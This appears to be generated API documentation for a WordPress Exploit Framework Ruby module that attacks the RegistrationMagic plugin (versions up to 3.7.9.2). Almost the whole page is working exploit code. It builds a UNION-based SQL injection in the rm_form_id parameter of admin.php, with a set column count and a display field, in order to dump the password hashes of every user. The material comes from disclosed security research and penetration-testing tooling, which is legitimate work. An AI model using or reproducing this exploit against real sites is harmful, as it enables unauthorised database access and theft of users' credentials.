class Wpxf::Auxiliary::RegistrationMagicHashDump
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::HashDump::new
# File lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb, line 6 def initialize super update_info( name: 'RegistrationMagic - Custom Registration Forms <= 3.7.9.2 Authenticated Hash Dump', desc: %( RegistrationMagic - Custom Registration Forms <= 3.7.9.2 suffers from an SQL injection vulnerability which is exploitable by registered users with the required privileges to manage the plugin. This module utilises the vulnerability to dump the hashed passwords of all users in the database. ), author: [ 'rastating' # Disclosure + WPXF module ], references: [ ['WPVDB', '8975'], ['URL', 'https://www.rastating.com/registrationmagic-custom-registration-forms-3-7-9-2-authenticated-sql-injection'] ], date: 'Dec 10 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb, line 30 def check check_plugin_version_from_readme('custom-registration-form-builder-with-submission-manager', '3.7.9.3') end
hashdump_custom_union_values()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb, line 45 def hashdump_custom_union_values values = Array.new(11) values[4] = 'concat(0x54,0x65,0x78,0x74,0x62,0x6f,0x78)' values end
hashdump_number_of_cols()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb, line 55 def hashdump_number_of_cols 11 end
hashdump_request_params()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb, line 38 def hashdump_request_params { 'page' => 'rm_field_manage', 'rm_form_id' => "-#{Utility::Text.rand_numeric(2)} UNION #{hashdump_sql_statement}" } end
hashdump_visible_field_index()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb, line 51 def hashdump_visible_field_index 3 end
requires_authentication()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb, line 34 def requires_authentication true end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb, line 59 def vulnerable_url normalize_uri(wordpress_url_admin, 'admin.php') end